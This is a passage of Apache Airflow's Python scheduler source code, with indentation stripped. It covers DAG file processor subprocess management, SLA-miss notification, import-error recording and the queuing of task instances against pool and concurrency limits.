self._start_time: Optional[datetime.datetime] = None
# This ID is use to uniquely name the process / thread that's launched
# by this processor instance
self._instance_id = DagFileProcessorProcess.class_creation_counter
self._parent_channel: Optional[MultiprocessingConnection] = None
DagFileProcessorProcess.class_creation_counter += 1
@property
def file_path(self) -> str:
return self._file_path
@staticmethod
def _run_file_processor(
result_channel: MultiprocessingConnection,
parent_channel: MultiprocessingConnection,
file_path: str,
pickle_dags: bool,
dag_ids: Optional[List[str]],
thread_name: str,
callback_requests: List[CallbackRequest],
) -> None:
"""
Process the given file.
:param result_channel: the connection to use for passing back the result
:type result_channel: multiprocessing.Connection
:param parent_channel: the parent end of the channel to close in the child
:type parent_channel: multiprocessing.Connection
:param file_path: the file to process
:type file_path: str
:param pickle_dags: whether to pickle the DAGs found in the file and
save them to the DB
:type pickle_dags: bool
:param dag_ids: if specified, only examine DAG ID's that are
in this list
:type dag_ids: list[str]
:param thread_name: the name to use for the process that is launched
:type thread_name: str
:param callback_requests: failure callback to execute
:type callback_requests: List[airflow.utils.callback_requests.CallbackRequest]
:return: the process that was launched
:rtype: multiprocessing.Process
"""
# This helper runs in the newly created process
log: logging.Logger = logging.getLogger("airflow.processor")
# Since we share all open FDs from the parent, we need to close the parent side of the pipe here in
# the child, else it won't get closed properly until we exit.
log.info("Closing parent pipe")
parent_channel.close()
del parent_channel
set_context(log, file_path)
setproctitle(f"airflow scheduler - DagFileProcessor {file_path}")
try:
# redirect stdout/stderr to log
with redirect_stdout(StreamLogWriter(log, logging.INFO)), redirect_stderr(
StreamLogWriter(log, logging.WARN)
), Stats.timer() as timer:
# Re-configure the ORM engine as there are issues with multiple processes
settings.configure_orm()
# Change the thread name to differentiate log lines. This is
# really a separate process, but changing the name of the
# process doesn't work, so changing the thread name instead.
threading.current_thread().name = thread_name
log.info("Started process (PID=%s) to work on %s", os.getpid(), file_path)
dag_file_processor = DagFileProcessor(dag_ids=dag_ids, log=log)
result: Tuple[int, int] = dag_file_processor.process_file(
file_path=file_path,
pickle_dags=pickle_dags,
callback_requests=callback_requests,
)
result_channel.send(result)
log.info("Processing %s took %.3f seconds", file_path, timer.duration)
except Exception: # pylint: disable=broad-except
# Log exceptions through the logging framework.
log.exception("Got an exception! Propagating...")
raise
finally:
# We re-initialized the ORM within this Process above so we need to
# tear it down manually here
settings.dispose_orm()
result_channel.close()
def start(self) -> None:
"""Launch the process and start processing the DAG."""
start_method = self._get_multiprocessing_start_method()
context = multiprocessing.get_context(start_method)
_parent_channel, _child_channel = context.Pipe(duplex=False)
process = context.Process(
target=type(self)._run_file_processor,
args=(
_child_channel,
_parent_channel,
self.file_path,
self._pickle_dags,
self._dag_ids,
f"DagFileProcessor{self._instance_id}",
self._callback_requests,
),
name=f"DagFileProcessor{self._instance_id}-Process",
)
self._process = process
self._start_time = timezone.utcnow()
process.start()
# Close the child side of the pipe now the subprocess has started -- otherwise this would prevent it
# from closing in some cases
_child_channel.close()
del _child_channel
# Don't store it on self until after we've started the child process - we don't want to keep it from
# getting GCd/closed
self._parent_channel = _parent_channel
def kill(self) -> None:
"""Kill the process launched to process the file, and ensure consistent state."""
if self._process is None:
raise AirflowException("Tried to kill before starting!")
self._kill_process()
def terminate(self, sigkill: bool = False) -> None:
"""
Terminate (and then kill) the process launched to process the file.
:param sigkill: whether to issue a SIGKILL if SIGTERM doesn't work.
:type sigkill: bool
"""
if self._process is None or self._parent_channel is None:
raise AirflowException("Tried to call terminate before starting!")
self._process.terminate()
# Arbitrarily wait 5s for the process to die
with suppress(TimeoutError):
self._process._popen.wait(5) # type: ignore # pylint: disable=protected-access
if sigkill:
self._kill_process()
self._parent_channel.close()
def _kill_process(self) -> None:
if self._process is None:
raise AirflowException("Tried to kill process before starting!")
if self._process.is_alive() and self._process.pid:
self.log.warning("Killing DAGFileProcessorProcess (PID=%d)", self._process.pid)
os.kill(self._process.pid, signal.SIGKILL)
if self._parent_channel:
self._parent_channel.close()
@property
def pid(self) -> int:
"""
:return: the PID of the process launched to process the given file
:rtype: int
"""
if self._process is None or self._process.pid is None:
raise AirflowException("Tried to get PID before starting!")
return self._process.pid
@property
def exit_code(self) -> Optional[int]:
"""
After the process is finished, this can be called to get the return code
:return: the exit code of the process
:rtype: int
"""
if self._process is None:
raise AirflowException("Tried to get exit code before starting!")
if not self._done:
raise AirflowException("Tried to call retcode before process was finished!")
return self._process.exitcode
@property
def done(self) -> bool:
"""
Check if the process launched to process this file is done.
:return: whether the process is finished running
:rtype: bool
"""
if self._process is None or self._parent_channel is None:
raise AirflowException("Tried to see if it's done before starting!")
if self._done:
return True
if self._parent_channel.poll():
try:
self._result = self._parent_channel.recv()
self._done = True
self.log.debug("Waiting for %s", self._process)
self._process.join()
self._parent_channel.close()
return True
except EOFError:
# If we get an EOFError, it means the child end of the pipe has been closed. This only happens
# in the finally block. But due to a possible race condition, the process may have not yet
# terminated (it could be doing cleanup/python shutdown still). So we kill it here after a
# "suitable" timeout.
self._done = True
# Arbitrary timeout -- error/race condition only, so this doesn't need to be tunable.
self._process.join(timeout=5)
if self._process.is_alive():
# Didn't shut down cleanly - kill it
self._kill_process()
if not self._process.is_alive():
self._done = True
self.log.debug("Waiting for %s", self._process)
self._process.join()
self._parent_channel.close()
return True
return False
@property
def result(self) -> Optional[Tuple[int, int]]:
"""
:return: result of running DagFileProcessor.process_file()
:rtype: tuple[int, int] or None
"""
if not self.done:
raise AirflowException("Tried to get the result before it's done!")
return self._result
@property
def start_time(self) -> datetime.datetime:
"""
:return: when this started to process the file
:rtype: datetime
"""
if self._start_time is None:
raise AirflowException("Tried to get start time before it started!")
return self._start_time
@property
def waitable_handle(self):
return self._process.sentinel
class DagFileProcessor(LoggingMixin):
"""
Process a Python file containing Airflow DAGs.
This includes:
1. Execute the file and look for DAG objects in the namespace.
2. Pickle the DAG and save it to the DB (if necessary).
3. For each DAG, see what tasks should run and create appropriate task
instances in the DB.
4. Record any errors importing the file into ORM
5. Kill (in ORM) any task instances belonging to the DAGs that haven't
issued a heartbeat in a while.
Returns a list of SimpleDag objects that represent the DAGs found in
the file
:param dag_ids: If specified, only look at these DAG ID's
:type dag_ids: List[str]
:param log: Logger to save the processing process
:type log: logging.Logger
"""
UNIT_TEST_MODE: bool = conf.getboolean('core', 'UNIT_TEST_MODE')
def __init__(self, dag_ids: Optional[List[str]], log: logging.Logger):
super().__init__()
self.dag_ids = dag_ids
self._log = log
@provide_session
def manage_slas(self, dag: DAG, session: Session = None) -> None:
"""
Finding all tasks that have SLAs defined, and sending alert emails
where needed. New SLA misses are also recorded in the database.
We are assuming that the scheduler runs often, so we only check for
tasks that should have succeeded in the past hour.
"""
if not any(isinstance(ti.sla, timedelta) for ti in dag.tasks):
self.log.info("Skipping SLA check for %s because no tasks in DAG have SLAs", dag)
return
qry = (
session.query(TI.task_id, func.max(TI.execution_date).label('max_ti'))
.with_hint(TI, 'USE INDEX (PRIMARY)', dialect_name='mysql')
.filter(TI.dag_id == dag.dag_id)
.filter(or_(TI.state == State.SUCCESS, TI.state == State.SKIPPED))
.filter(TI.task_id.in_(dag.task_ids))
.group_by(TI.task_id)
.subquery('sq')
)
max_tis: List[TI] = (
session.query(TI)
.filter(
TI.dag_id == dag.dag_id,
TI.task_id == qry.c.task_id,
TI.execution_date == qry.c.max_ti,
)
.all()
)
ts = timezone.utcnow()
for ti in max_tis:
task = dag.get_task(ti.task_id)
if not isinstance(task.sla, timedelta):
continue
dttm = dag.following_schedule(ti.execution_date)
while dttm < timezone.utcnow():
following_schedule = dag.following_schedule(dttm)
if following_schedule + task.sla < timezone.utcnow():
session.merge(
SlaMiss(task_id=ti.task_id, dag_id=ti.dag_id, execution_date=dttm, timestamp=ts)
)
dttm = dag.following_schedule(dttm)
session.commit()
# pylint: disable=singleton-comparison
slas: List[SlaMiss] = (
session.query(SlaMiss)
.filter(SlaMiss.notification_sent == False, SlaMiss.dag_id == dag.dag_id) # noqa
.all()
)
# pylint: enable=singleton-comparison
if slas: # pylint: disable=too-many-nested-blocks
sla_dates: List[datetime.datetime] = [sla.execution_date for sla in slas]
fetched_tis: List[TI] = (
session.query(TI)
.filter(TI.state != State.SUCCESS, TI.execution_date.in_(sla_dates), TI.dag_id == dag.dag_id)
.all()
)
blocking_tis: List[TI] = []
for ti in fetched_tis:
if ti.task_id in dag.task_ids:
ti.task = dag.get_task(ti.task_id)
blocking_tis.append(ti)
else:
session.delete(ti)
session.commit()
task_list = "\n".join([sla.task_id + ' on ' + sla.execution_date.isoformat() for sla in slas])
blocking_task_list = "\n".join(
[ti.task_id + ' on ' + ti.execution_date.isoformat() for ti in blocking_tis]
)
# Track whether email or any alert notification sent
# We consider email or the alert callback as notifications
email_sent = False
notification_sent = False
if dag.sla_miss_callback:
# Execute the alert callback
self.log.info('Calling SLA miss callback')
try:
dag.sla_miss_callback(dag, task_list, blocking_task_list, slas, blocking_tis)
notification_sent = True
except Exception: # pylint: disable=broad-except
self.log.exception("Could not call sla_miss_callback for DAG %s", dag.dag_id)
email_content = f"""\
Here's a list of tasks that missed their SLAs:
<pre><code>{task_list}\n<code></pre>
Blocking tasks:
<pre><code>{blocking_task_list}<code></pre>
Airflow Webserver URL: {conf.get(section='webserver', key='base_url')}
"""
tasks_missed_sla = []
for sla in slas:
try:
task = dag.get_task(sla.task_id)
except TaskNotFound:
# task already deleted from DAG, skip it
self.log.warning(
"Task %s doesn't exist in DAG anymore, skipping SLA miss notification.", sla.task_id
)
continue
tasks_missed_sla.append(task)
emails: Set[str] = set()
for task in tasks_missed_sla:
if task.email:
if isinstance(task.email, str):
emails |= set(get_email_address_list(task.email))
elif isinstance(task.email, (list, tuple)):
emails |= set(task.email)
if emails:
try:
send_email(emails, f"[airflow] SLA miss on DAG={dag.dag_id}", email_content)
email_sent = True
notification_sent = True
except Exception: # pylint: disable=broad-except
Stats.incr('sla_email_notification_failure')
self.log.exception("Could not send SLA Miss email notification for DAG %s", dag.dag_id)
# If we sent any notification, update the sla_miss table
if notification_sent:
for sla in slas:
sla.email_sent = email_sent
sla.notification_sent = True
session.merge(sla)
session.commit()
@staticmethod
def update_import_errors(session: Session, dagbag: DagBag) -> None:
"""
For the DAGs in the given DagBag, record any associated import errors and clears
errors for files that no longer have them. These are usually displayed through the
Airflow UI so that users know that there are issues parsing DAGs.
:param session: session for ORM operations
:type session: sqlalchemy.orm.session.Session
:param dagbag: DagBag containing DAGs with import errors
:type dagbag: airflow.DagBag
"""
# Clear the errors of the processed files
for dagbag_file in dagbag.file_last_changed:
session.query(errors.ImportError).filter(errors.ImportError.filename == dagbag_file).delete()
# Add the errors of the processed files
for filename, stacktrace in dagbag.import_errors.items():
session.add(
errors.ImportError(filename=filename, timestamp=timezone.utcnow(), stacktrace=stacktrace)
)
session.commit()
@provide_session
def execute_callbacks(
self, dagbag: DagBag, callback_requests: List[CallbackRequest], session: Session = None
) -> None:
"""
Execute on failure callbacks. These objects can come from SchedulerJob or from
DagFileProcessorManager.
:param dagbag: Dag Bag of dags
:param callback_requests: failure callbacks to execute
:type callback_requests: List[airflow.utils.callback_requests.CallbackRequest]
:param session: DB session.
"""
for request in callback_requests:
try:
if isinstance(request, TaskCallbackRequest):
self._execute_task_callbacks(dagbag, request)
elif isinstance(request, SlaCallbackRequest):
self.manage_slas(dagbag.dags.get(request.dag_id))
elif isinstance(request, DagCallbackRequest):
self._execute_dag_callbacks(dagbag, request, session)
except Exception: # pylint: disable=broad-except
self.log.exception(
"Error executing %s callback for file: %s",
request.__class__.__name__,
request.full_filepath,
)
session.commit()
@provide_session
def _execute_dag_callbacks(self, dagbag: DagBag, request: DagCallbackRequest, session: Session):
dag = dagbag.dags[request.dag_id]
dag_run = dag.get_dagrun(execution_date=request.execution_date, session=session)
dag.handle_callback(
dagrun=dag_run, success=not request.is_failure_callback, reason=request.msg, session=session
)
def _execute_task_callbacks(self, dagbag: DagBag, request: TaskCallbackRequest):
simple_ti = request.simple_task_instance
if simple_ti.dag_id in dagbag.dags:
dag = dagbag.dags[simple_ti.dag_id]
if simple_ti.task_id in dag.task_ids:
task = dag.get_task(simple_ti.task_id)
ti = TI(task, simple_ti.execution_date)
# Get properties needed for failure handling from SimpleTaskInstance.
ti.start_date = simple_ti.start_date
ti.end_date = simple_ti.end_date
ti.try_number = simple_ti.try_number
ti.state = simple_ti.state
ti.test_mode = self.UNIT_TEST_MODE
if request.is_failure_callback:
ti.handle_failure(request.msg, ti.test_mode, ti.get_template_context())
self.log.info('Executed failure callback for %s in state %s', ti, ti.state)
@provide_session
def process_file(
self,
file_path: str,
callback_requests: List[CallbackRequest],
pickle_dags: bool = False,
session: Session = None,
) -> Tuple[int, int]:
"""
Process a Python file containing Airflow DAGs.
This includes:
1. Execute the file and look for DAG objects in the namespace.
2. Pickle the DAG and save it to the DB (if necessary).
3. For each DAG, see what tasks should run and create appropriate task
instances in the DB.
4. Record any errors importing the file into ORM
:param file_path: the path to the Python file that should be executed
:type file_path: str
:param callback_requests: failure callback to execute
:type callback_requests: List[airflow.utils.dag_processing.CallbackRequest]
:param pickle_dags: whether serialize the DAGs found in the file and
save them to the db
:type pickle_dags: bool
:param session: Sqlalchemy ORM Session
:type session: Session
:return: number of dags found, count of import errors
:rtype: Tuple[int, int]
"""
self.log.info("Processing file %s for tasks to queue", file_path)
try:
dagbag = DagBag(file_path, include_examples=False, include_smart_sensor=False)
except Exception: # pylint: disable=broad-except
self.log.exception("Failed at reloading the DAG file %s", file_path)
Stats.incr('dag_file_refresh_error', 1, 1)
return 0, 0
if len(dagbag.dags) > 0:
self.log.info("DAG(s) %s retrieved from %s", dagbag.dags.keys(), file_path)
else:
self.log.warning("No viable dags retrieved from %s", file_path)
self.update_import_errors(session, dagbag)
return 0, len(dagbag.import_errors)
self.execute_callbacks(dagbag, callback_requests)
# Save individual DAGs in the ORM
dagbag.sync_to_db()
if pickle_dags:
paused_dag_ids = DagModel.get_paused_dag_ids(dag_ids=dagbag.dag_ids)
unpaused_dags: List[DAG] = [
dag for dag_id, dag in dagbag.dags.items() if dag_id not in paused_dag_ids
]
for dag in unpaused_dags:
dag.pickle(session)
# Record import errors into the ORM
try:
self.update_import_errors(session, dagbag)
except Exception: # pylint: disable=broad-except
self.log.exception("Error logging import errors!")
return len(dagbag.dags), len(dagbag.import_errors)
class SchedulerJob(BaseJob): # pylint: disable=too-many-instance-attributes
"""
This SchedulerJob runs for a specific time interval and schedules the jobs
that are ready to run. It figures out the latest runs for each
task and sees if the dependencies for the next schedules are met.
If so, it creates appropriate TaskInstances and sends run commands to the
executor. It does this for each task in each DAG and repeats.
:param dag_id: if specified, only schedule tasks with this DAG ID
:type dag_id: str
:param dag_ids: if specified, only schedule tasks with these DAG IDs
:type dag_ids: list[str]
:param subdir: directory containing Python files with Airflow DAG
definitions, or a specific path to a file
:type subdir: str
:param num_runs: The number of times to run the scheduling loop. If you
have a large number of DAG files this could complete before each file
has been parsed. -1 for unlimited times.
:type num_runs: int
:param num_times_parse_dags: The number of times to try to parse each DAG file.
-1 for unlimited times.
:type num_times_parse_dags: int
:param processor_poll_interval: The number of seconds to wait between
polls of running processors
:type processor_poll_interval: int
:param do_pickle: once a DAG object is obtained by executing the Python
file, whether to serialize the DAG object to the DB
:type do_pickle: bool
"""
__mapper_args__ = {'polymorphic_identity': 'SchedulerJob'}
heartrate: int = conf.getint('scheduler', 'SCHEDULER_HEARTBEAT_SEC')
def __init__(
self,
subdir: str = settings.DAGS_FOLDER,
num_runs: int = conf.getint('scheduler', 'num_runs'),
num_times_parse_dags: int = -1,
processor_poll_interval: float = conf.getfloat('scheduler', 'processor_poll_interval'),
do_pickle: bool = False,
log: Any = None,
*args,
**kwargs,
):
self.subdir = subdir
self.num_runs = num_runs
# In specific tests, we want to stop the parse loop after the _files_ have been parsed a certain
# number of times. This is only to support testing, and isn't something a user is likely to want to
# configure -- they'll want num_runs
self.num_times_parse_dags = num_times_parse_dags
self._processor_poll_interval = processor_poll_interval
self.do_pickle = do_pickle
super().__init__(*args, **kwargs)
if log:
self._log = log
# Check what SQL backend we use
sql_conn: str = conf.get('core', 'sql_alchemy_conn').lower()
self.using_sqlite = sql_conn.startswith('sqlite')
self.using_mysql = sql_conn.startswith('mysql')
self.max_tis_per_query: int = conf.getint('scheduler', 'max_tis_per_query')
self.processor_agent: Optional[DagFileProcessorAgent] = None
self.dagbag = DagBag(dag_folder=self.subdir, read_dags_from_db=True)
def register_signals(self) -> None:
"""Register signals that stop child processes"""
signal.signal(signal.SIGINT, self._exit_gracefully)
signal.signal(signal.SIGTERM, self._exit_gracefully)
signal.signal(signal.SIGUSR2, self._debug_dump)
def _exit_gracefully(self, signum, frame) -> None: # pylint: disable=unused-argument
"""Helper method to clean up processor_agent to avoid leaving orphan processes."""
self.log.info("Exiting gracefully upon receiving signal %s", signum)
if self.processor_agent:
self.processor_agent.end()
sys.exit(os.EX_OK)
def _debug_dump(self, signum, frame): # pylint: disable=unused-argument
try:
sig_name = signal.Signals(signum).name # pylint: disable=no-member
except Exception: # pylint: disable=broad-except
sig_name = str(signum)
self.log.info("%s\n%s received, printing debug\n%s", "-" * 80, sig_name, "-" * 80)
self.executor.debug_dump()
self.log.info("-" * 80)
def is_alive(self, grace_multiplier: Optional[float] = None) -> bool:
"""
Is this SchedulerJob alive?
We define alive as in a state of running and a heartbeat within the
threshold defined in the ``scheduler_health_check_threshold`` config
setting.
``grace_multiplier`` is accepted for compatibility with the parent class.
:rtype: boolean
"""
if grace_multiplier is not None:
# Accept the same behaviour as superclass
return super().is_alive(grace_multiplier=grace_multiplier)
scheduler_health_check_threshold: int = conf.getint('scheduler', 'scheduler_health_check_threshold')
return (
self.state == State.RUNNING
and (timezone.utcnow() - self.latest_heartbeat).total_seconds() < scheduler_health_check_threshold
)
@provide_session
def _change_state_for_tis_without_dagrun(
self, old_states: List[str], new_state: str, session: Session = None
) -> None:
"""
For all DAG IDs in the DagBag, look for task instances in the
old_states and set them to new_state if the corresponding DagRun
does not exist or exists but is not in the running state. This
normally should not happen, but it can if the state of DagRuns are
changed manually.
:param old_states: examine TaskInstances in this state
:type old_states: list[airflow.utils.state.State]
:param new_state: set TaskInstances to this state
:type new_state: airflow.utils.state.State
"""
tis_changed = 0
query = (
session.query(models.TaskInstance)
.outerjoin(models.TaskInstance.dag_run)
.filter(models.TaskInstance.dag_id.in_(list(self.dagbag.dag_ids)))
.filter(models.TaskInstance.state.in_(old_states))
.filter(
or_(
# pylint: disable=comparison-with-callable
models.DagRun.state != State.RUNNING,
# pylint: disable=no-member
models.DagRun.state.is_(None),
)
)
)
# We need to do this for mysql as well because it can cause deadlocks
# as discussed in https://issues.apache.org/jira/browse/AIRFLOW-2516
if self.using_sqlite or self.using_mysql:
tis_to_change: List[TI] = with_row_locks(query, of=TI, **skip_locked(session=session)).all()
for ti in tis_to_change:
ti.set_state(new_state, session=session)
tis_changed += 1
else:
subq = query.subquery()
current_time = timezone.utcnow()
ti_prop_update = {
models.TaskInstance.state: new_state,
models.TaskInstance.start_date: current_time,
}
# Only add end_date and duration if the new_state is 'success', 'failed' or 'skipped'
if new_state in State.finished:
ti_prop_update.update(
{
models.TaskInstance.end_date: current_time,
models.TaskInstance.duration: 0,
}
)
tis_changed = (
session.query(models.TaskInstance)
.filter(
models.TaskInstance.dag_id == subq.c.dag_id,
models.TaskInstance.task_id == subq.c.task_id,
models.TaskInstance.execution_date == subq.c.execution_date,
)
.update(ti_prop_update, synchronize_session=False)
)
if tis_changed > 0:
session.flush()
self.log.warning(
"Set %s task instances to state=%s as their associated DagRun was not in RUNNING state",
tis_changed,
new_state,
)
Stats.gauge('scheduler.tasks.without_dagrun', tis_changed)
@provide_session
def __get_concurrency_maps(
self, states: List[str], session: Session = None
) -> Tuple[DefaultDict[str, int], DefaultDict[Tuple[str, str], int]]:
"""
Get the concurrency maps.
:param states: List of states to query for
:type states: list[airflow.utils.state.State]
:return: A map from (dag_id, task_id) to # of task instances and
a map from (dag_id, task_id) to # of task instances in the given state list
:rtype: tuple[dict[str, int], dict[tuple[str, str], int]]
"""
ti_concurrency_query: List[Tuple[str, str, int]] = (
session.query(TI.task_id, TI.dag_id, func.count('*'))
.filter(TI.state.in_(states))
.group_by(TI.task_id, TI.dag_id)
).all()
dag_map: DefaultDict[str, int] = defaultdict(int)
task_map: DefaultDict[Tuple[str, str], int] = defaultdict(int)
for result in ti_concurrency_query:
task_id, dag_id, count = result
dag_map[dag_id] += count
task_map[(dag_id, task_id)] = count
return dag_map, task_map
# pylint: disable=too-many-locals,too-many-statements
@provide_session
def _executable_task_instances_to_queued(self, max_tis: int, session: Session = None) -> List[TI]:
"""
Finds TIs that are ready for execution with respect to pool limits,
dag concurrency, executor state, and priority.
:param max_tis: Maximum number of TIs to queue in this loop.
:type max_tis: int
:return: list[airflow.models.TaskInstance]
"""
executable_tis: List[TI] = []
# Get the pool settings. We get a lock on the pool rows, treating this as a "critical section"
# Throws an exception if lock cannot be obtained, rather than blocking
pools = models.Pool.slots_stats(lock_rows=True, session=session)
# If the pools are full, there is no point doing anything!
# If _somehow_ the pool is overfull, don't let the limit go negative - it breaks SQL
pool_slots_free = max(0, sum(pool['open'] for pool in pools.values()))
if pool_slots_free == 0:
self.log.debug("All pools are full!")
return executable_tis
max_tis = min(max_tis, pool_slots_free)
# Get all task instances associated with scheduled
# DagRuns which are not backfilled, in the given states,
# and the dag is not paused
query = (
session.query(TI)
.outerjoin(TI.dag_run)
.filter(or_(DR.run_id.is_(None), DR.run_type != DagRunType.BACKFILL_JOB))
.join(TI.dag_model)
.filter(not_(DM.is_paused))
.filter(TI.state == State.SCHEDULED)
.options(selectinload('dag_model'))
.limit(max_tis)
)
task_instances_to_examine: List[TI] = with_row_locks(
query,
of=TI,
**skip_locked(session=session),
).all()
# TODO[HA]: This was wrong before anyway, as it only looked at a sub-set of dags, not everything.
# Stats.gauge('scheduler.tasks.pending', len(task_instances_to_examine))
if len(task_instances_to_examine) == 0:
self.log.debug("No tasks to consider for execution.")
return executable_tis
# Put one task instance on each line
task_instance_str = "\n\t".join([repr(x) for x in task_instances_to_examine])
self.log.info("%s tasks up for execution:\n\t%s", len(task_instances_to_examine), task_instance_str)
pool_to_task_instances: DefaultDict[str, List[models.Pool]] = defaultdict(list)
for task_instance in task_instances_to_examine:
pool_to_task_instances[task_instance.pool].append(task_instance)
# dag_id to # of running tasks and (dag_id, task_id) to # of running tasks.
dag_concurrency_map: DefaultDict[str, int]
task_concurrency_map: DefaultDict[Tuple[str, str], int]
dag_concurrency_map, task_concurrency_map = self.__get_concurrency_maps(
states=list(EXECUTION_STATES), session=session
)
num_tasks_in_executor = 0
# Number of tasks that cannot be scheduled because of no open slot in pool
num_starving_tasks_total = 0
# Go through each pool, and queue up a task for execution if there are
# any open slots in the pool.
# pylint: disable=too-many-nested-blocks
for pool, task_instances in pool_to_task_instances.items():
pool_name = pool
if pool not in pools:
self.log.warning("Tasks using non-existent pool '%s' will not be scheduled", pool)
continue
open_slots = pools[pool]["open"]
num_ready = len(task_instances)
self.log.info(
"Figuring out tasks to run in Pool(name=%s) with %s open slots "
"and %s task instances ready to be queued",
pool,
open_slots,
num_ready,
)
priority_sorted_task_instances = sorted(
task_instances, key=lambda ti: (-ti.priority_weight, ti.execution_date)
)
num_starving_tasks = 0
for current_index, task_instance in enumerate(priority_sorted_task_instances):
if open_slots <= 0:
self.log.info("Not scheduling since there are %s open slots in pool %s", open_slots, pool)
# Can't schedule any more since there are no more open slots.
num_unhandled = len(priority_sorted_task_instances) - current_index
num_starving_tasks += num_unhandled
num_starving_tasks_total += num_unhandled
break
# Check to make sure that the task concurrency of the DAG hasn't been
# reached.
dag_id = task_instance.dag_id
current_dag_concurrency = dag_concurrency_map[dag_id]
dag_concurrency_limit = task_instance.dag_model.concurrency
self.log.info(
"DAG %s has %s/%s running and queued tasks",
dag_id,
current_dag_concurrency,
dag_concurrency_limit,
)
if current_dag_concurrency >= dag_concurrency_limit:
self.log.info(
"Not executing %s since the number of tasks running or queued "
"from DAG %s is >= to the DAG's task concurrency limit of %s",
task_instance,
dag_id,
dag_concurrency_limit,
)
continue
task_concurrency_limit: Optional[int] = None
if task_instance.dag_model.has_task_concurrency_limits:
# Many dags don't have a task_concurrency, so where we can avoid loading the full
# serialized DAG the better.
serialized_dag = self.dagbag.get_dag(dag_id, session=session)
if serialized_dag.has_task(task_instance.task_id):
task_concurrency_limit = serialized_dag.get_task(
task_instance.task_id
).task_concurrency
if task_concurrency_limit is not None:
current_task_concurrency = task_concurrency_map[
(task_instance.dag_id, task_instance.task_id)
]
if current_task_concurrency >= task_concurrency_limit:
self.log.info(
"Not executing %s since the task concurrency for"
" this task has been reached.",
task_instance,
)
continue
if task_instance.pool_slots > open_slots:
self.log.info(
"Not executing %s since it requires %s slots "
"but there are %s open slots in the pool %s.",
task_instance,
task_instance.pool_slots,
open_slots,
pool,
)
num_starving_tasks += 1
num_starving_tasks_total += 1
# Though we can execute tasks with lower priority if there's enough room
continue
executable_tis.append(task_instance)
open_slots -= task_instance.pool_slots
dag_concurrency_map[dag_id] += 1
task_concurrency_map[(task_instance.dag_id, task_instance.task_id)] += 1
Stats.gauge(f'pool.starving_tasks.{pool_name}', num_starving_tasks)
Stats.gauge('scheduler.tasks.starving', num_starving_tasks_total)
Stats.gauge('scheduler.tasks.running', num_tasks_in_executor)
Stats.gauge('scheduler.tasks.executable', len(executable_tis))
task_instance_str = "\n\t".join([repr(x) for x in executable_tis])
self.log.info("Setting the following tasks to queued state:\n\t%s", task_instance_str)
# set TIs to queued state
filter_for_tis = TI.filter_for_tis(executable_tis)
session.query(TI).filter(filter_for_tis).update(
# TODO[ha]: should we use func.now()? How does that work with DB timezone on mysql when it's not
# UTC?
{TI.state: State.QUEUED, TI.queued_dttm: timezone.utcnow(), TI.queued_by_job_id: self.id},
synchronize_session=False,
)
for ti in executable_tis:
make_transient(ti)
return executable_tis
def _enqueue_task_instances_with_queued_state(self, task_instances: List[TI]) -> None:
"""
Takes task_instances, which should have been set to queued, and enqueues them
with the executor.
:param task_instances: TaskInstances to enqueue
:type task_instances: list[TaskInstance]
"""
# actually enqueue them
for ti in task_instances:
command = TI.generate_command(
ti.dag_id,
ti.task_id,
ti.execution_date,
local=True,
mark_success=False,
ignore_all_deps=False,
ignore_depends_on_past=False,
ignore_task_deps=False,
ignore_ti_state=False,
pool=ti.pool,
file_path=ti.dag_model.fileloc,
pickle_id=ti.dag_model.pickle_id,
)
priority = ti.priority_weight
queue = ti.queue
self.log.info("Sending %s to executor with priority %s and queue %s", ti.key, priority, queue)
self.executor.queue_command(
ti,
command,
priority=priority,
queue=queue,
)
def _critical_section_execute_task_instances(self, session: Session) -> int:
"""
Attempts to execute TaskInstances that should be executed by the scheduler.
There are three steps:
1. Pick TIs by priority with the constraint that they are in the expected states
and that we do exceed max_active_runs or pool limits.
2. Change the state for the TIs above atomically.
3. Enqueue the TIs in the executor.
HA note: This function is a "critical section" meaning that only a single executor process can execute
this function at the same time. This is achieved by doing ``SELECT ... from pool FOR UPDATE``. For DBs
that support NOWAIT, a "blocked" scheduler will skip this and continue on with other tasks (creating
new DAG runs, progressing TIs from None to SCHEDULED etc.); DBs that don't support this (such as
MariaDB or MySQL 5.x) the other schedulers will wait for the lock before continuing.
:param session:
:type session: sqlalchemy.orm.Session
:return: Number of task instance with state changed.
"""
max_tis = min(self.max_tis_per_query, self.executor.slots_available)
queued_tis = self._executable_task_instances_to_queued(max_tis, session=session)
self._enqueue_task_instances_with_queued_state(queued_tis)
return len(queued_tis)
@provide_session
def _change_state_for_tasks_failed_to_execute(self, session: Session = None):
"""
If there are tasks left over in the executor,
we set them back to SCHEDULED to avoid creating hanging tasks.
:param session: session for ORM operations
"""
if not self.executor.queued_tasks:
return
filter_for_ti_state_change = [
and_(
TI.dag_id == dag_id,
TI.task_id == task_id,
TI.execution_date == execution_date,
# The TI.try_number will return raw try_number+1 since the
# ti is not running. And we need to -1 to match the DB record.
TI._try_number == try_number - 1, # pylint: disable=protected-access
TI.state == State.QUEUED,
)
for dag_id, task_id, execution_date, try_number in self.executor.queued_tasks.keys()
]
ti_query = session.query(TI).filter(or_(*filter_for_ti_state_change))
tis_to_set_to_scheduled: List[TI] = with_row_locks(ti_query).all()
if not tis_to_set_to_scheduled:
return
# set TIs to queued state
filter_for_tis = TI.filter_for_tis(tis_to_set_to_scheduled)
session.query(TI).filter(filter_for_tis).update(
{TI.state: State.SCHEDULED, TI.queued_dttm: None}, synchronize_session=False
)
for task_instance in tis_to_set_to_scheduled:
self.executor.queued_tasks.pop(task_instance.key)
task_instance_str = "\n\t".join(repr(x) for x in tis_to_set_to_scheduled)
self.log.info("Set the following tasks to scheduled state:\n\t%s", task_instance_str)
@provide_session
def _process_executor_events(self, session: Session = None) -> int:
"""Respond to executor events."""
if not self.processor_agent:
raise ValueError("Processor agent is not started.")
ti_primary_key_to_try_number_map: Dict[Tuple[str, str, datetime.datetime], int] = {}
event_buffer = self.executor.get_event_buffer()
tis_with_right_state: List[TaskInstanceKey] = []
# Report execution
for ti_key, value in event_buffer.items():
state: str
state, _ = value
# We create map (dag_id, task_id, execution_date) -> in-memory try_number
ti_primary_key_to_try_number_map[ti_key.primary] = ti_key.try_number
self.log.info(
"Executor reports execution of %s.%s execution_date=%s "
"exited with status %s for try_number %s",
ti_key.dag_id,
ti_key.task_id,
ti_key.execution_date,
state,
ti_key.try_number,
)
if state in (State.FAILED, State.SUCCESS, State.QUEUED):
tis_with_right_state.append(ti_key)
# Return if no finished tasks
if not tis_with_right_state:
return len(event_buffer)
# Check state of finished tasks
filter_for_tis = TI.filter_for_tis(tis_with_right_state)
